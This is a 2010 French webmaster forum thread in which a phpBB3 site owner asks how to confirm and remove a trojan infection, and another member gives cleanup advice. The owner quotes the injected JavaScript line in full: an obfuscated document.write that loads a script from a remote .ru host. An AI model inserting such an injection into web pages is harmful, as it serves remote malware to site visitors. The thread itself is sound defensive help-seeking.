Infection troyen phpbb3

Discussion dans 'Développement d'un site Web ou d'une appli mobile' créé par gauksque, 2 Août 2010.

  1. gauksque
    gauksque WRInaute occasionnel
    Inscrit:
    12 Mars 2008
    Messages:
    276
    J'aime reçus:
    0
    Bonjour à tous !

    Je viens de recevoir un email d'un de mes membres qui dit que mon forum phpbb3 est infecté par un troyen, savez-vous comment vérifier cette information, ensuite comment éradiquer le problème ?

    d'avance merci,

    Gautier
     
  2. Zecat
    Zecat WRInaute accro
    Inscrit:
    1 Mars 2005
    Messages:
    9 176
    J'aime reçus:
    1
    regarde si c'est celui qu'on connait bien ...

    il pose deux ligne en bas des fichier index et des .js

    Dans ce cas :

    1 - vérifier anti virus sur la machine qui te sert a te connecter a ton ftp (9/10 ca passe par filezila et ses password non cryptés)
    2 - Changer tes most de passe ftp pour des trucs bien compliqués
    3 - nettoyer tous les fichiers concernés sur le serveur (et en local chez toi)
    4 - faire une demande de réexamen du site par google pour virer l'imagette
     
  3. gauksque
    gauksque WRInaute occasionnel
    Inscrit:
    12 Mars 2008
    Messages:
    276
    J'aime reçus:
    0
    merci bcp pour ta réponse... Cette fameuse ligne dans les js de \styles\prosilver\template c'est bien celle-ci ?

    document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Gibibyte.js"></scr'+'ipt>');

    Peux-tu me dire tous les fichiers qui son infecté par cette saleté ? Je ne vois pas de quoi tu veux parler en parlant de fichiers index ? De quoi s'agit t'il ?
     
  4. Zecat
    Zecat WRInaute accro
    Inscrit:
    1 Mars 2005
    Messages:
    9 176
    J'aime reçus:
    1
    Oui c'est bien ce genhre de ligne ajoutée ..

    Sur : tous les fichiers sur ton site dont le nom est index quelque chose (dans tous les repertoires) et tous les fichier dont le nom se terminent par .js
     
  5. gauksque
    gauksque WRInaute occasionnel
    Inscrit:
    12 Mars 2008
    Messages:
    276
    J'aime reçus:
    0
    je n'ai pas rencontré un seul index qui soit infecté ! Peux-tu me donner des exemples d'index normalement infecté ? Est-ce toujours en toute fin de code ?

    est-ce qu'il faut vraiment modifier ces identifiants FTP ?


    Le troyen en lui même, que fait il ?